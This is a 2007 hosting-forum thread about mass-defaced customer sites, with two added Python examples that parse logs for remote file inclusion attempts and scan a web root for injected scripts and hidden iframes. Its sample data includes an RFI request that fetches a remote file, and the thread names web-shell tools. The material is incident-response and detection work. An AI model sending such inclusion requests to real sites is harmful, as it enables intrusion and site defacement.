Lunarpages Web Hosting Forum

Author Topic: Security Issue with Multiple Hosting Accounts (8/28/2007 - 9/14/2007)  (Read 21769 times)

Offline eemerton

  • Newbie
  • *
  • Posts: 5
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #30 on: September 04, 2007, 09:35:58 AM »
This is more widespread -- NOT just php, also JSP. -- Every single page on my sites at LP of form - index.jsp, index.html, main.jsp, login.jsp -- all had this stuff inserted on Sept 2nd at 1:13 PM. A <script></script> piece right after <body> -- or at the bottom of the files if they didn't contain a <body>. Not sure what the stuff does, but it's a bunch of URLs to csufresno.edu. Pages I haven't touched in months or years - and across about 15 sub directories of my public_html main directory. I alerted LP through a support ticket. I'm on the spica server.

Offline JJ

  • Trekkie
  • **
  • Posts: 18
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #31 on: September 04, 2007, 11:46:54 AM »
As I said previously, I have password protected all web directories and have changed all my passwords. I will monitor for a couple of days to see if any other pages get changed.

I have to ask the question again though: How is this happening?! Is it purely because passwords have been guessed?

Offline Peak

  • Spacescooter Operator
  • *****
  • Posts: 44
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #32 on: September 04, 2007, 12:02:56 PM »
No guessed passwords for me. They logged into 2 of my accounts with ftp and changed all index.php-files.

I would suspect that the only thing possible is that logins have leaked somewhere.

My reasoning:

Before we bought the dedicated server, two of our accounts were hosted on LP with the same password as we continued with when we moved the two accounts to a dedicated server. And then we created a third account. Accounts 1 and 2 were hacked almost simultaneously, the third one (which LP doesn't have the PW for) remained unchanged.

Either that, or there's some hole in apache or something. Can't be CPanel. We use Webmin.

This theory is only a theory, though. It may be correct, it may be completely wrong. They may have hacked my server due to some insecure script on my part. It's difficult to search all the logs due to all the data in them.
« Last Edit: September 04, 2007, 12:04:53 PM by Peak »
//Peak

Offline JJ

  • Trekkie
  • **
  • Posts: 18
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #33 on: September 04, 2007, 12:20:20 PM »
Quote
Before we bought the dedicated server, two of our accounts were hosted on LP with the same password as we continued with when we moved the two accounts to a dedicated server. And then we created a third account. Accounts 1 and 2 were hacked almost simultaneously, the third one (which LP doesn't have the PW for) remained unchanged.

I have two accounts. One is PHP based, the other standard HTML. BOTH were hacked, with only (I hope) index. and login. files changed.

Very interesting what you say - so the question I now have is has anyone other than LP users experienced this problem?

Another question, and I am still trying to get my head around this, but apart from guessing my passwords, is there any other way a hack could have got in and done this?

Offline Peak

  • Spacescooter Operator
  • *****
  • Posts: 44
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #34 on: September 04, 2007, 12:30:49 PM »
Not with websites with pure HTML. If you hack a website, you normally have to find some way to get in through some hole in a script (php or asp or similar). Happened to me once, where a hacker succeeded in uploading a script of his own that gave him full control over the account. My own fault, I hadn't updated that script. No chance of this with an HTML website. Nothing to include anywhere.

//Peak

Offline JJ

  • Trekkie
  • **
  • Posts: 18
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #35 on: September 04, 2007, 12:44:59 PM »
Quote
Not with websites with pure HTML. If you hack a website, you normally have to find some way to get in through some hole in a script (php or asp or similar). Happened to me once, where a hacker succeeded in uploading a script of his own that gave him full control over the account. My own fault, I hadn't updated that script. No chance of this with an HTML website. Nothing to include anywhere.

OK, I bent the truth a little, I did have some PHP stuff on there, from a php forum.  :(

So, from what you are saying then it is not necessarily because my passwords have been guessed but because of some PHP scripts I have? I have a few Dreamweaver add-ons and a PHP forum (pre-written stuff). Have never had a problem with them before and have been running for a couple of years  :?

Offline SteveW

  • Master Jedi
  • *****
  • Posts: 1392
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #36 on: September 04, 2007, 12:49:23 PM »
JJ and Peak,

There are ways they can get in without knowing the password, and ways they can keep coming back even after you've changed the pw. If you search these forums on "hacked", you'll find quite a few previous threads started by other people whose sites got hacked.  It's a lot of reading; how far you get will depend on how interested you are. 

A remote file inclusion (RFI) vulnerability (a weak script that allowed them to inject their own code and "include" a file from a remote site) can allow them to upload a "shell script" into your site and run it. Some of the shell scripts that are used are well written and sophisticated (web search r57, c99), and can have basically the same effect as an .msi installer program. Have you ever watched a commercial program install itself on your computer, listing the dozens or hundreds of files as it installs them?

Once the website is compromised, the hacker can also change permissions on files and folders, install backdoor scripts that give them remote access (no passwords required, and password changes will not keep them out), download any files they want from your site, obtain the files that contain your password hashes (and then subject them to very fast offline pw-cracking methods), and on and on and on...

The fact that your site logs contain a lot of data shouldn't make it impossible to use them as a data source. If you're lucky enough to find their accesses in your FTP log, search your HTTP log for other occurrences of their IP address, especially just before the first FTP access, and going back as much as a month before that. If you find that IP address in your log, and the line looks like GET filename.ext?something=somevalue, then you have an indication that the avenue of entry might have been an RFI attack, and you also know which of your files (filename.ext) to check for weaknesses. That's just one example of the type of detective work that can be done. 

Any site that has been hacked, even "just a little bit", should be inspected carefully for non-obvious damage such as backdoor scripts that might be in out of the way places or in new subdirectories you don't know about. "Hoping" isn't a good plan! Do a thorough inspection. Since the links injected by this script are invisible, it appears that this one, like most professional hacks, was intended to go unnoticed.

That having been said, I can't say I have the slightest idea how this particular hack occurred; that's why LP staff are investigating now.  But you expressed an interest in the general concepts involved, and so the above are some of them.  There are things that you can be doing now that can assist the investigation, rather than leaving it entirely up to LP. You know your sites better than they do and have a greater ability to notice things that don't look right.
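
Added example (not code from any poster in this thread): the log "detective work" SteveW describes, done mechanically. It takes every client IP seen in the FTP log, pulls that IP's HTTP requests from the month before its first FTP access, and flags requests whose query string carries a remote URL in a parameter, the shape of a remote file inclusion attempt. The log lines, IP addresses, script names and parameter names are constructed for the example (documentation address ranges, made-up file names); the FTP lines follow a vsftpd-style layout and the HTTP lines Apache's combined format, and both logs are assumed to be in the same local time.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log lines, not taken from the thread or from any poster's server.
# Addresses come from documentation ranges; file names and parameters are made up.
FTP_LOG = """\
Sun Sep  2 13:13:02 2007 [pid 4242] [siteuser] OK LOGIN: Client "203.0.113.7"
Sun Sep  2 13:13:05 2007 [pid 4242] [siteuser] OK UPLOAD: Client "203.0.113.7", "/public_html/index.php", 2311 bytes
Mon Sep  3 09:02:11 2007 [pid 4301] [siteuser] OK LOGIN: Client "192.0.2.5"
"""

ACCESS_LOG = """\
192.0.2.5 - - [28/Aug/2007:10:04:12 -0500] "GET /forum/viewtopic.php?id=3 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.7 - - [30/Aug/2007:22:41:07 -0500] "GET /forum/viewtopic.php?id=1 HTTP/1.1" 200 7990 "-" "Mozilla/4.0"
203.0.113.7 - - [30/Aug/2007:22:41:09 -0500] "GET /scripts/gallery.php?template=http://198.51.100.9/x.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.7 - - [02/Sep/2007:13:20:30 -0500] "GET /index.php HTTP/1.1" 200 2311 "-" "Mozilla/4.0"
"""

# vsftpd-style line: timestamp first, then ... Client "a.b.c.d"
FTP_RE = re.compile(r'^(\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) .*?Client "([\d.]+)"')
# Apache combined format; the timezone offset is matched and ignored
# (assumption: both logs are written in the same local time)
ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\] ]+) [^\]]*\] "(\S+) (\S+) [^"]*" (\d{3})')
REMOTE_SCHEMES = ("http", "https", "ftp")


def ftp_accesses(lines):
    """Return (timestamp, client_ip) for every FTP log line that names a client."""
    out = []
    for line in lines.splitlines():
        m = FTP_RE.match(line)
        if m:
            stamp = re.sub(r"\s+", " ", m.group(1))  # collapse the padded day number
            out.append((datetime.strptime(stamp, "%a %b %d %H:%M:%S %Y"), m.group(2)))
    return out


def access_entries(lines):
    """Parse Apache combined-format lines into dicts with a naive local timestamp."""
    out = []
    for line in lines.splitlines():
        m = ACCESS_RE.match(line)
        if m:
            ip, stamp, method, target, status = m.groups()
            out.append({"ip": ip, "when": datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S"),
                        "method": method, "target": target, "status": int(status)})
    return out


def remote_url_params(target):
    """Query parameters whose value is itself a remote URL: the RFI fingerprint.
    Returns (script path, parameter name, value) for each such parameter."""
    parts = urlsplit(target)
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if urlsplit(value).scheme.lower() in REMOTE_SCHEMES:
            hits.append((parts.path, name, value))
    return hits


def suspicious_requests(ftp_log, access_log, lookback=timedelta(days=30)):
    """For each IP in the FTP log: its HTTP requests in the month before its first
    FTP access, and which of those carried a remote URL in a parameter."""
    first_ftp = {}
    for when, ip in ftp_accesses(ftp_log):
        if ip not in first_ftp or when < first_ftp[ip]:
            first_ftp[ip] = when
    entries = access_entries(access_log)
    report = {}
    for ip, first in first_ftp.items():
        window = [e for e in entries if e["ip"] == ip and first - lookback <= e["when"] <= first]
        report[ip] = {
            "first_ftp": first,
            "requests_before_ftp": len(window),
            "rfi_indicators": [hit for e in window for hit in remote_url_params(e["target"])],
        }
    return report


if __name__ == "__main__":
    for ip, info in suspicious_requests(FTP_LOG, ACCESS_LOG).items():
        print(ip, info["first_ftp"], info["requests_before_ftp"], "requests before FTP")
        for path, param, value in info["rfi_indicators"]:
            print("  check", path, "parameter", param, "->", value)
```

Run against real logs by reading the two files into `FTP_LOG` and `ACCESS_LOG`; the script paths in `rfi_indicators` are the files to inspect first, and an IP that appears in the FTP log with no prior HTTP history at all points toward a leaked or guessed password rather than a script hole.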

Offline Peak

  • Spacescooter Operator
  • *****
  • Posts: 44
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #37 on: September 04, 2007, 12:53:30 PM »
Not necessarily. Forums are often attacked, so if you have the latest version there should be no problem. Developers of php and asp applications are aware of the risks, so they tend to make the scripts as secure as possible. If there's a vulnerability, that hole tends to be closed rather quickly and an upgrade of the script becomes available.

Therefore, it's quite important to always have the latest version of any script, in case there's some way for a hacker to get in.

But, I do stress, that there's no way I know of to get account information (ftp passwords and stuff) from hacking a website with a script. They may change things on your website, upload viruses and similar stuff, but they still work from the outside within the limits of the vulnerability.

Edit: This was a reply to JJ, but I agree with what SteveW said. And no, the IP that hacked my website was not in the apache logs. That, I have checked. And LP have checked the rest of the server and found no trojans or anything like that. Well, I changed the PWs and so far, so good.
« Last Edit: September 04, 2007, 12:59:18 PM by Peak »
//Peak

Offline SteveW

  • Master Jedi
  • *****
  • Posts: 1392
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #38 on: September 04, 2007, 01:08:46 PM »
Quote
But, I do stress, that there's no way I know of to get account information (ftp passwords and stuff) from hacking a website with a script...
I believe that's correct. I haven't found anything in my site that looks like a hash of my cpanel/ftp password (though I could be wrong). There are hashes of email account passwords, so those could be downloaded and cracked offline. You can be sure that if they do crack it, they'll check to see if you might be using the same pw for cPanel and ftp.

However, php provides its own ftp handling functions, so if they can get their own php script to run on your site, they have ftp access through PHP, and don't need your ftp password. I think that's correct, but am not 100% sure, as I haven't used any of those functions myself. I found them in the PHP manual. I'd expect those accesses would also show in the ftp log, same as others, but I'm not sure of that, either. If they are logged, there might be some way to tell them apart from your own "publishing" ftp accesses, but I don't know what that would be.

Offline Peak

  • Spacescooter Operator
  • *****
  • Posts: 44
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #39 on: September 04, 2007, 01:16:31 PM »
I do think that there would be a difference between using php-functions and the ftp-server. I'm not sure, but I would think that the php-commands for uploading a file should show up in the apache log while the ftp-server activity is logged in the ftp log.
//Peak

Offline JJ

  • Trekkie
  • **
  • Posts: 18
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #40 on: September 04, 2007, 01:20:05 PM »
Steve: THANK YOU !!  :thumb: Exactly what I wanted to know. And having checked I see that I am one version below the latest phpBB release for the forum.  :notme:

Thank you too Peak for your input.  :thumb:

I plan to wipe my webserver clean to make sure it has no residue of these hacks. Then I will re-install the forum software to the latest version, restore the forum database and then open it back up for visitors. I will then keep a very close eye on the index. and login. files to see if any hacks get in.

I'll watch this for a couple of weeks and if it remains safe then I'll re-install the rest of the website. If I get attacks shortly after this then I will then at least have a rough idea that my weakness is probably going to be with my main website scripts and not my phpBB ones.

Well, I say a plan, I am sure more experienced web designers would do it differently, but it's the only way I can think of to make sure I clean everything up.

I still think though that it is kind of strange that this affected so many people all at once at LP. Is anyone aware of anyone else being affected outside of LP with this specific attack?


« Last Edit: September 04, 2007, 01:23:46 PM by JJ »

Offline SteveW

  • Master Jedi
  • *****
  • Posts: 1392
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #41 on: September 04, 2007, 01:59:31 PM »
Quote
I plan to wipe my webserver clean to make sure it has no residue of these hacks.
I gather you're on a dedicated plan?

I'm on basic shared, but that's pretty much my plan, too, if this ever happens and if the first cleanup attempt seems to fail (i.e. if there's a re-hack after the cleanup). I don't know if LP staff can "push a button" and wipe an entire site clean, not just public_html (I can empty that myself), but including "/", too, for a fresh start with all the permissions as they should be, etc., as though the site is newly created.

Quote
I'll watch this for a couple of weeks and if it remains safe then I'll re-install the rest of the website. If I get attacks shortly after this then I will then at least have a rough idea that my weakness is probably going to be with my main website scripts and not my phpBB ones.
My non-researched "impression" is that the phpBB weaknesses have been pretty serious.

Did your logs show nothing suspicious? Besides the FTP log, another place to find the time of the hack would be timestamps on modified files. And any HTTP accesses just prior to that moment are worth having a look at.

I'd hate to have to hold off publishing for a couple of weeks!  :smiling: True, it wouldn't inconvenience that many people, but I don't think I could stand it.

Quote
Is anyone aware of anyone else being affected outside of LP with this specific attack?

I just did a web search (Google and Live) on "watch77.com/tds", and found 4 sites showing the iframe. 3 LP and 1 at a host in Texas. Edit: 4 is a very small number, which makes this look like it must be new. A web search for similar strings from other hacks has sometimes turned up thousands of sites. I think there's a thread here from last January where someone said they found 30,000.
« Last Edit: September 04, 2007, 05:14:36 PM by SteveW »
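
Added example (not code from any poster in this thread) for the file-side half of the investigation: the modification-time check SteveW suggests, combined with a content check for the injection shapes eemerton and SteveW describe (a `<script>` block straight after `<body>`, a trailing `<script>` in files that have no `<body>`, and an invisible iframe). It walks a web root, reports every file modified inside a chosen window regardless of type (so new files in odd subdirectories surface too), and every web file carrying one of those shapes regardless of its timestamp. The sample site it builds in a temporary directory, its file names, contents and the `example.invalid` host are all constructed for the example.

```python
import os
import re
import tempfile
from datetime import datetime

WEB_EXTENSIONS = {".html", ".htm", ".php", ".jsp", ".shtml"}

# Injection shapes described in the thread.
BODY_THEN_SCRIPT = re.compile(r"<body\b[^>]*>\s*(<script\b.*?</script>)", re.I | re.S)
TRAILING_SCRIPT = re.compile(r"(<script\b.*?</script>)\s*$", re.I | re.S)
HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*(?:display\s*:\s*none|width\s*=\s*[\"']?0\b|height\s*=\s*[\"']?0\b)[^>]*>", re.I)

# Window around the reported injection time (Sept 2nd, 1:13 PM); adjust to your own timestamps.
HACK_WINDOW = (datetime(2007, 9, 2, 13, 0), datetime(2007, 9, 2, 14, 0))


def injected_block(html):
    """Return the first snippet matching one of the injection shapes, or None.
    A legitimate page may also start <body> with a script, so treat hits as triage, not proof."""
    m = BODY_THEN_SCRIPT.search(html)
    if m:
        return m.group(1)
    if not re.search(r"<body\b", html, re.I):
        m = TRAILING_SCRIPT.search(html)
        if m:
            return m.group(1)
    m = HIDDEN_IFRAME.search(html)
    return m.group(0) if m else None


def scan_tree(root, since, until):
    """Walk root; report any file modified inside [since, until] and any web file
    that carries an injection shape. Each finding lists the reasons it was reported."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            mtime = datetime.fromtimestamp(os.stat(path).st_mtime)
            reasons = []
            if since <= mtime <= until:
                reasons.append("modified in window")
            if os.path.splitext(name)[1].lower() in WEB_EXTENSIONS:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    snippet = injected_block(fh.read())
                if snippet:
                    reasons.append("injected: " + snippet[:60])
            if reasons:
                findings.append({"path": os.path.relpath(path, root), "mtime": mtime, "reasons": reasons})
    return sorted(findings, key=lambda f: f["path"])


def build_sample_site():
    """Create a constructed public_html tree in a temp dir (left in place) and return its path."""
    root = tempfile.mkdtemp(prefix="public_html_")
    hacked_at = datetime(2007, 9, 2, 13, 13).timestamp()
    old = datetime(2006, 5, 1, 8, 0).timestamp()
    samples = {  # relative path: (content, mtime)
        "index.php": ('<html><body><script src="http://example.invalid/x.js"></script><p>Home</p></body></html>', hacked_at),
        "about.html": ("<html><body>\n<p>About</p>\n</body></html>\n", old),
        os.path.join("inc", "footer.jsp"): ("<div>Footer</div>\n<script>document.write('x')</script>\n", hacked_at),
        "legacy.html": ('<html><body><p>Old</p><iframe src="http://example.invalid/tds" width="0" height="0"></iframe></body></html>', old),
        os.path.join("images", ".cache", "x.php"): ("<?php /* constructed placeholder for an unknown new file */ ?>\n", hacked_at + 60),
    }
    for rel, (content, ts) in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
        os.utime(path, (ts, ts))
    return root


def demo():
    """Build the sample site and scan it with the fixed window."""
    return scan_tree(build_sample_site(), *HACK_WINDOW)


if __name__ == "__main__":
    for f in demo():
        print(f["path"], f["mtime"], "; ".join(f["reasons"]))
```

Point `scan_tree` at a real web root with a window taken from the FTP log or from the earliest bad file you already know about; `about.html` shows a clean old file staying silent, `legacy.html` shows an old file caught by content alone, and the `.cache/x.php` entry shows why the timestamp pass must cover every file type, not only pages.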

Offline SteveW

  • Master Jedi
  • *****
  • Posts: 1392
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #42 on: September 04, 2007, 02:14:03 PM »
Quote
Before we bought the dedicated server, two of our accounts were hosted on LP with the same password as we continued with when we moved the two accounts to a dedicated server. And then we created a third account. Accounts 1 and 2 were hacked almost simultaneously, the third one (which LP doesn't have the PW for) remained unchanged.

This theory is only a theory, though.
But it is an interesting set of circumstances. 

Did the two hacked sites have links to each other, such that a crawler might have zipped directly from one to the next and then tried using the same password on it, just in case it might work?

LP (or any host) can become a target of particularly intense attacks (of which some will succeed) without necessarily having a hole. It's possible to get (for a fee) a list of all the sites on a given server. There are people out there whose accounts were cancelled by LP for spamming, fraud, or whatever, and no doubt they aren't too happy about it.

Edit: In case you're concerned that it's not being taken seriously, though, I am sure that it is. When they say admins are looking into it, that indicates an unusual level of interest and investigation. With most site hacks, there's really not much to investigate except within the site itself, which is the responsibility of the site owner. If a bunch get hit at once, it's different.
« Last Edit: September 04, 2007, 05:24:03 PM by SteveW »

Offline SteveW

  • Master Jedi
  • *****
  • Posts: 1392
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #43 on: September 04, 2007, 06:04:17 PM »
Interesting article, "Know Your Enemy": http://www.honeynet.org/papers/webapp/

Offline JeremyD

  • SleePy...
  • Jabba the Hutt
  • *****
  • Posts: 733
  • SMF Team Member
    • LcT Tribe
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #44 on: September 04, 2007, 06:09:59 PM »
Interesting to know that FTP was used.

To me this seems like a Lunar Admin's account was compromised, giving them access to all the customers' accounts. Then they used that to look at the passwords in the database.